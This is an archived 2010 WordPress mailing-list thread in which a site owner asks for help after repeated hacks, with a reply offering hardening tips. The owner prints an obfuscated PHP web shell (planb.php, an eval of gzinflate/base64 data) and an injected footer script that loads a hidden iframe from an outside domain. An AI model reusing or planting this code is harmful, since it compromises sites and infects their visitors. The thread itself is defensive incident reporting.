[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Mladen Adamovic mladen.adamovic at gmail.com
Sun Oct 31 18:51:24 UTC 2010 

The website was hacked multiple times. While I was trying to prevent it
happen again :
- I did upgrade to latest version
- changed passwords
- made fresh wordpress install, imported RSS feed of old instance
and disabled all plugins I don't use.

..and it was hacked again.

I did now checked access.logs files with grep and all what I could find
suspicious is :

access.log:69.163.128.12 - - [31/Oct/2010:03:05:04 -0700] "POST
/wp-cron.php?doing_wp_cron HTTP/1.0" 200 184 "-" "WordPress/3.0.1; "

access.log.2010-10-29:64.0.55.44 - - [29/Oct/2010:13:39:27 -0700] "POST
/wp-admin/includes/planb.php HTTP/1.1" 200 8194 "
http://blog.numbeo.com/wp-admin/includes/planb.php" "Mozilla/5.0 (Windows;
U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 AskTbSPC2/3.8.0.12304
Firefox/3.6.12 WebMoney Advisor"

This planb.php looks fishy with it's content :
<?PHP
set_time_limit(0);
$login = "";
$pass = "";
$md5_pass = "";
eval(gzinflate(base64_decode('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



I did remove it. I did add security at wordpress.org to this thread.

Comments appreciated.






On Sun, Oct 31, 2010 at 7:15 PM, Ozh <ozh at ozh.org> wrote:

> Typically not a Dreamhost issue, otherwise there would be *thousands*
> of people screaming, and me in first line
>
> Being up to date with WP is fine, but most hack on shared hosting are
> not done using WP
> - check file permissions <http://codex.wordpress.org/Hardening_WordPress>
> - check other softwares & scripts running on your blog
> - change your main/SSH/FTP password
> - change your WP password
>
> I once had a WP blog hacked on Dreamhost. A few hours of investigation
> later (checking all the above + inspecting access logs) I found out
> that the insecure stuff was Scuttle (a delicious clone).
>
> On shared hosting WP is often the target, but rarely the entrance.
>
> On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
> <mladen.adamovic at gmail.com> wrote:
> > Hi guys,
> >
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it did use and couldn't identify it, but it
> was
> > adding the following code to my default theme footer.php:
> >
> > <script>
> > enc =
> >
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify
> exploit
> > it did use.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> >
>
>
>
> --
> http://ozh.org/
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

More information about the wp-hackers mailing list